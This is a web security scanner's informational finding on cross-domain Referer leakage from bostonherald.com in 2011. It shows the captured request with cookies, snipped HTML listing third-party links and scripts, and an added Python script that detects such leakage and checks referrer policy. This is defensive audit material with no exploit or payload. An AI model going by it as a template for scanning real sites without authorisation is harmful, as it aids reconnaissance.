
Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /homepage.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the fragments that carry them are shown in the response excerpt below.
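This entry and the two before it (17.269 and 17.270) are the same informational finding: each page was requested with a query string, and the response links to or embeds resources from other hosts, so a browser that follows those references sends the full request URL, query string included, in the Referer header. The script below is an added example that reproduces the scanner's check over a constructed sample; it is not code from this report or from the tool that generated it. It is fed a trimmed copy of the 17.269 request URL, response headers and body (the sample is constructed from those excerpts), and the names URL_ATTRS, SAFE_POLICIES, cross_domain_hosts and referer_leak are chosen here. It goes beyond what the report shows by also consulting a Referrer-Policy header and a meta referrer tag, neither of which existed when this 2011 scan was run; with both absent it reports the browser default, which sends the full URL to same-scheme cross-origin targets.

```python
"""Cross-domain Referer leakage check, rebuilt from the report's evidence.

Given the request URL (with its query string), the response headers and the
response body, list every third-party host the page links to or embeds and
decide whether a browser would send the query string to them in Referer.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tag/attribute pairs that make the browser issue a request carrying a Referer.
URL_ATTRS = {
    "a": ("href",),
    "link": ("href",),
    "img": ("src",),
    "script": ("src",),
    "iframe": ("src",),
    "form": ("action",),
}

# Policies under which a cross-origin request carries at most the origin,
# so the path and query string never leave the site.
SAFE_POLICIES = {
    "no-referrer", "same-origin", "origin", "strict-origin",
    "origin-when-cross-origin", "strict-origin-when-cross-origin",
}


class LinkCollector(HTMLParser):
    """Collect candidate URLs and any <meta name="referrer"> policy."""

    def __init__(self):
        super().__init__()
        self.urls = []
        self.meta_policy = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "meta" and (attrs.get("name") or "").lower() == "referrer":
            self.meta_policy = (attrs.get("content") or "").strip().lower()
        for name in URL_ATTRS.get(tag, ()):
            value = attrs.get(name)
            if value:
                self.urls.append(value)


def cross_domain_hosts(page_url, body):
    """Return (sorted third-party hosts, meta referrer policy or None)."""
    collector = LinkCollector()
    collector.feed(body)
    own_host = urlsplit(page_url).hostname
    hosts = set()
    for raw in collector.urls:
        target = urlsplit(urljoin(page_url, raw.strip()))
        if target.scheme not in ("http", "https"):
            continue  # javascript:, mailto:, data: never carry a Referer
        if target.hostname and target.hostname != own_host:
            hosts.add(target.hostname)
    return sorted(hosts), collector.meta_policy


def referer_leak(page_url, headers, body):
    """Report whether the query string of page_url reaches other domains."""
    hosts, meta_policy = cross_domain_hosts(page_url, body)
    lowered = {k.lower(): v for k, v in headers.items()}
    # The header takes precedence over <meta>; with both absent the browser
    # default applies and the full URL goes to same-scheme cross-origin hosts.
    policy = (lowered.get("referrer-policy") or meta_policy or "").strip().lower()
    query = urlsplit(page_url).query
    return {
        "query": query,
        "hosts": hosts,
        "policy": policy or None,
        "leaks": bool(query) and bool(hosts) and policy not in SAFE_POLICIES,
    }


# Constructed sample: a trimmed copy of the 17.269 request URL, response
# headers and response fragments quoted in this report.
PAGE_URL = ("http://www.bostonherald.com/entertainment/movies/reviews/view.bg"
            "?articleid=1312518&srvc=home&position=also")
HEADERS = {
    "Server": "Apache",
    "X-Powered-By": "PHP/5.2.0-8+etch16",
    "Content-Type": "text/html; charset=UTF-8",
}
BODY = """
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<iframe src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" width="300" height="225"></iframe>
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&amp;format=email">E-mail</a>
<a class="alt" href="javascript:void(0);">Features</a>
<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>
"""

if __name__ == "__main__":
    result = referer_leak(PAGE_URL, HEADERS, BODY)
    print("query string :", result["query"])
    print("third parties:", ", ".join(result["hosts"]))
    print("policy       :", result["policy"] or "(none: browser default)")
    print("leaks        :", result["leaks"])
```

Same-site relative links and javascript: URLs are dropped, so the sample yields four third-party hosts, one of which (cache.heraldinteractive.com) is the publisher's own asset host and would be triaged out by hand. The query strings in these three requests carry only article, gallery and display identifiers, which is why the scanner rates the finding Information; the same leak is a real problem when a session token, a password-reset token or an e-mail address travels in the query string, and the remedies are to keep such values out of URLs and, on current browsers, to send a restrictive Referrer-Policy.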

Request

GET /homepage.bg?showResults=1#results HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 156016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128mankins_believes_pats_days_are_over/srvc=home&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="250" width="315" alt="Logan Mankins believes Patriots days are over"></a>
...[SNIP]...
<a href="/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=1"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/18e69eb546_stpDeLeo012811AC.jpg" alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=1">
...[SNIP]...
<a href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/89c5b31e64_stpRite012811.jpg" alt="ALL WRONG: Anthony Hopkins and Colin O&#x2019;Donoghue star in &#x2018;The Rite,&#x2019; an &#x2018;Exorcist&#x2019;-inspired thriller."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2">
...[SNIP]...
<a href="/blogs/sports/celtics/"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/b6181f7db3_DieselTEASE.jpg" alt="Paul Pierce and Shaquille O&rsquo;Neal will play tonight in Phoenix. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/business/general/view/20110128goldman_sachs_triples_salaries_for_5_top_executives/format=comments&srvc=home&position=recent">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128lawrence_officer_convicted_of_rape/format=comments&srvc=home&position=recent">
...[SNIP]...
<a href="/entertainment/arts_culture/view/2011012865-million_spider-man_leaves_broadway_hanging/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8df24f_Spidey_01292011.jpg" alt="WEB OF WOES: The highly expensive Broadway musical &lsquo;Spider-Man Turn: Off the Dark&rsquo; has been the victim of bad press, according to director Julie Taymor."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/arts_culture/view/2011012865-million_spider-man_leaves_broadway_hanging/format=comments&srvc=home&position=recent">
...[SNIP]...
<!--// AD CONTAINER //-->
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" alt="Bad Rabbits">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=6">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<!-- <div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/index.php/2011/01/28/the-holiday-radio-ratings-rundown/"><img src="http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=3065"><img src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/live-from-honolulu-logan-mankins-on-the-pats-i-dont-see-them-trying-to-keep-me/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/mankins-looking-up.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/"><img src="http://cache.heraldinteractive.com/blogs/news/lone_republican/wp-content/uploads/2011/01/deval-82709.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/"><img src="http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=3679"><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&amp;page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping&nbsp;Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/07.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/02.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/basketball/celtics/view/20110128shaquille_oneal_earns_fresh_shot_eyes_return_tonight_in_phoenix/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg" alt="WELL WITHIN REACH: Kevin Garnett tries to slap the ball away from the Trail Blazers&#x2019; LaMarcus Aldridge during last night&#x2019;s 88-78 Celtics victory in Portland." /></a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&amp;page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in &#x2018;The Mechanic,&#x2019; a remake of the Charles Bronson film directed by Michael Winner." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
